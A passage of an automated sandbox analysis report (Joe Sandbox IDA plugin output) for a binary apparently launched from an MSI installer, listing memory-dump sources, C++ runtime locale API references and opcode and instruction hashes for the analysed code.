                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                        • API String ID: 1452528299-1782174991
                                                                        • Opcode ID: 21b6162489e24d823cee7a3cbc78f8b9a73683ca917ea0f7d20d3fbb2906608e
                                                                        • Instruction ID: da56529ca5c2e3bf90ddd8955a1b959dd703bf96a761d0e133af24dcd31e3b42
                                                                        • Instruction Fuzzy Hash: D4215C49A202628ACB741F3D8400739B3F0EF54755B6518AFECDAD7390FB698DC28390
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocstr$Maklocchr
                                                                        • String ID:
                                                                        • API String ID: 2020259771-0
                                                                        • Opcode ID: 890f096140a1f05beea16bcfb3b4fe19f9cb967ad6cbeee2b4ab5c7f033becab
                                                                        • Instruction ID: ab2a3822b72862426a548575c776f510fb9bf9746cf84ed7c0a1bb2c706b6090
                                                                        • Instruction Fuzzy Hash: 2C119EB1508784BBE720EBA69881F56B7ECFF08310F04051AF289CBA41D365FD5087A5
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE282A
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2834
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • numpunct.LIBCPMT ref: 00AE286E
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE2885
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE28A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                        • String ID:
                                                                        • API String ID: 743221004-0
                                                                        • Opcode ID: 3332173ce17caf2ca067647f1c4a9ee70fea71a9878aa1d0c9d430b896659e94
                                                                        • Instruction ID: b20ef12bf2e997f6c00d71cc787a608f25be14758f67edce4ff3873e966447ba
                                                                        • Instruction Fuzzy Hash: 0211E136D002998BCF08EB65DA516BE7BB9AF80710F680149E4116B391DF34AE01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE8037
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE8041
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • numpunct.LIBCPMT ref: 00AE807B
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE8092
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE80B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                        • String ID:
                                                                        • API String ID: 743221004-0
                                                                        • Opcode ID: b9f3958bd519cf676d3e3ce3134294e82981085162caee86eb3fe50306207e4c
                                                                        • Instruction ID: f56f89ac33395199e83c4e49f101e722dd9941ed85771d16e2bcc50b3ce3286e
                                                                        • Instruction Fuzzy Hash: 0F01F536D00659CBCF00EBA5DA456BE77B1AF84310F240149F4156B3D2DF38AE05CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE75BD
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE75C7
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • codecvt.LIBCPMT ref: 00AE7601
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7618
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7638
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: af5cebcf5f7973079471dfc822fadbf8f8fa2dbf5fb43a510d7f30c76a3fd357
                                                                        • Instruction ID: fe9c4dc43a6249d0b4f0f7aab77cde8be10a71cd4b9f2c2a972356e143a6e19c
                                                                        • Instruction Fuzzy Hash: 3101D2359046999BCB04EBB8DA056BE77B1BF84318F240109F4116B392DF34AE01DB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE76E7
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE76F1
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • collate.LIBCPMT ref: 00AE772B
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7742
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7762
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 235bb918272d3a4fadfdb8a99db077e297f17c605219de1f4d4d7006454df60d
                                                                        • Instruction ID: 0e3f543060ffb33ef85dc5599e42133c378c9a19338a5cf8266aef317ab52558
                                                                        • Opcode Fuzzy Hash: 235bb918272d3a4fadfdb8a99db077e297f17c605219de1f4d4d7006454df60d
                                                                        • Instruction Fuzzy Hash: BB01DE36D44659DBCB00EBA4EA46ABE77B1AF84310F240509F4216B392DF34AE02CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE266B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2675
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • codecvt.LIBCPMT ref: 00AE26AF
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE26C6
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE26E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: 2a8178a594553f991c6ab42459ee94c014dacada3e795804489b601b7dc0b213
                                                                        • Instruction ID: dd06821c0050739cf28cfef7e8dc1db841925076f97b07d7dd0dfa23f5b4641e
                                                                        • Opcode Fuzzy Hash: 2a8178a594553f991c6ab42459ee94c014dacada3e795804489b601b7dc0b213
                                                                        • Instruction Fuzzy Hash: E101D235D10299DBCB04EBA4D9457BE7BB5EF80310F250609F411AB391DF74AE018B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7652
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE765C
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • codecvt.LIBCPMT ref: 00AE7696
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE76AD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE76CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: 1c2081b9f26f55816b8361fae55043ac1f8b35bdbadd3ba731e439d3140f6bbc
                                                                        • Instruction ID: cb1afb8ab316fd667b77cb3c52cf24216df42a5a8ea429eac8d5e18932706149
                                                                        • Opcode Fuzzy Hash: 1c2081b9f26f55816b8361fae55043ac1f8b35bdbadd3ba731e439d3140f6bbc
                                                                        • Instruction Fuzzy Hash: 1701DE32910A598BCF01EBB8DA45ABEB7B1AF84314F25450AF9116B391DF34AE018B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE777C
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7786
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • collate.LIBCPMT ref: 00AE77C0
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE77D7
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE77F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 9a9ae4289d6ca1fabd3077653ce801951d85313ce240a4a977c2ced376f483d8
                                                                        • Instruction ID: 730fffb9a117e77f9517370d5811290db3e1ed1fd9d5352ea68db8a978755b53
                                                                        • Opcode Fuzzy Hash: 9a9ae4289d6ca1fabd3077653ce801951d85313ce240a4a977c2ced376f483d8
                                                                        • Instruction Fuzzy Hash: 4C01D235D04259DBCB05EBA5DA456BE77B1AF84310F240549F4216B3D2DF34AE02CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE78A6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE78B0
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • messages.LIBCPMT ref: 00AE78EA
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7901
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7921
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: 64e67b25b55849632d09257f206261dfe4f97155fda1ffc5fcf5b9ab981e3a98
                                                                        • Instruction ID: 5d9c5f9337b14e13fcc7892a276e96679b2086cce3616528ed0d54581ab57f0c
                                                                        • Opcode Fuzzy Hash: 64e67b25b55849632d09257f206261dfe4f97155fda1ffc5fcf5b9ab981e3a98
                                                                        • Instruction Fuzzy Hash: DB01DE36D0025ACBCB00EBB4EA456BE77B1AF80320F250909F5116B392DF34AE01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF38C8
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF38D2
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • collate.LIBCPMT ref: 00AF390C
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3923
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3943
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: cc3f301cbd9a33a89a5b7b086857d9ee36a88799c9b09ff41af6b0400d3c20e1
                                                                        • Instruction ID: 0c5ede5e5c49b7bf04d049452ec0d25232340530b53939a23d4a4728ca48a5d1
                                                                        • Opcode Fuzzy Hash: cc3f301cbd9a33a89a5b7b086857d9ee36a88799c9b09ff41af6b0400d3c20e1
                                                                        • Instruction Fuzzy Hash: 4301D23290021D9BCF00EBA4DA556BEBBB5AF80320F240109F6216B391DFB4AF018BD4
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7811
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE781B
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • ctype.LIBCPMT ref: 00AE7855
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE786C
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE788C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                        • String ID:
                                                                        • API String ID: 83828444-0
                                                                        • Opcode ID: 00ad3feeabea4c662b5f32266d92a7a21c6514cd43ff15a5e9bc2df83d91b998
                                                                        • Instruction ID: 5d3ba96fb391f66ad1b333a808e124d53862cc0f8d2af6165fb8886f3143b01d
                                                                        • Opcode Fuzzy Hash: 00ad3feeabea4c662b5f32266d92a7a21c6514cd43ff15a5e9bc2df83d91b998
                                                                        • Instruction Fuzzy Hash: 2901F535D1465ACBCB04EBA4D9456BE77B1BF84310F640509F4116B3D1DF34AE01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE793B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7945
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • messages.LIBCPMT ref: 00AE797F
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7996
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE79B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: e48cf0e85dd2404a9cc715e743117ef4dc4cd74628400645162f227e10343513
                                                                        • Instruction ID: 436d2f6a37a085ac96fa4d34eab02dad9b38ddf64b3ff41bff087695bdabc417
                                                                        • Opcode Fuzzy Hash: e48cf0e85dd2404a9cc715e743117ef4dc4cd74628400645162f227e10343513
                                                                        • Instruction Fuzzy Hash: 8901F132D00659CBCF05EBA4DA05ABE77B2AF80310F240549F8116B3D2CF74AE01CBA1
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF395D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3967
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • messages.LIBCPMT ref: 00AF39A1
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF39B8
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF39D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: daee38ac60c2ed885165d9acb7a8842e32af8247ac9cc26b67087d19df8be881
                                                                        • Instruction ID: 4848f0c32ae338f476f299f1cfa52f148ff40cb8ba32d26970fe313e96739e5a
                                                                        • Opcode Fuzzy Hash: daee38ac60c2ed885165d9acb7a8842e32af8247ac9cc26b67087d19df8be881
                                                                        • Instruction Fuzzy Hash: DB01D232D0021D9BCF00EBA4DA566BE7BB5AF80320F25050AF9116B391DFB4AF01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3BB1
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3BBB
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF3BF5
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3C0C
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3C2C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: a9e7b3b80001506d29ede8b20f8a27dd27743e353a4989f70199b34e19993e49
                                                                        • Instruction ID: 11e98d461a7821c4570660527d24a2ab19408ab46b6090618b06ffaf0e09eb4b
                                                                        • Opcode Fuzzy Hash: a9e7b3b80001506d29ede8b20f8a27dd27743e353a4989f70199b34e19993e49
                                                                        • Instruction Fuzzy Hash: 4501D23690021EDBCF00EBA4DA056BEB7B1AF84310F240509F6116B391CF74AE02CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3B1C
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3B26
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF3B60
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3B77
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3B97
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: e03705cd6394c1a86123c722fc63ba91dbbb27c009baf4adeb59161f6fafe160
                                                                        • Instruction ID: 3c24aeb2abb101564c9ddbb2c590a9d22e0f333dbe8d27ecc1fb2bcd0cdbad37
                                                                        • Opcode Fuzzy Hash: e03705cd6394c1a86123c722fc63ba91dbbb27c009baf4adeb59161f6fafe160
                                                                        • Instruction Fuzzy Hash: 2701D23691061DDBCF00EBA4DA556BEB7B1AF84310F250109F5156B391CF34AE01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7CB9
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7CC3
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AE7CFD
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7D14
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7D34
                                                                        Memory Dump Source
